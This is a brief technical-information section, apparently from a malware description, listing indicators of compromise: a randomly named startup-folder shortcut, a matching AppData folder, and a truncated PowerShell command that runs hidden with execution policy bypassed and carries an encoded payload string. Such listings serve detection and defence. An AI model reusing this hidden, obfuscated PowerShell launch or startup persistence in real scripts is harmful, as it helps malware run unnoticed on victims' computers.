Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\bxnhzajcugeqtxsvoiemyprqyukfzplgldvbitokhfmwcjaswnrd.lnk
- %LOCALAPPDATA%\bxnhzajcugeqtxsvoiemyprqyukfzplgldvbitokhfmwcjaswnrd
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WiNDOWsTyLE hiDDEn -EXeCutIoNpOlIcy bypasS -cOmmANd "$a7ab1dad2ba4be9db04dd3cf27a7e='QHZ4U1RAVDlZfkB2bn0qO2pOU0xpSitlSXBNOzM/Z3t5K3tyaD0mUW0ka2p+eDFXZGNuVCkjZm05VVRTb3tPYU15UEpnYWsqYiNSdShQUH1...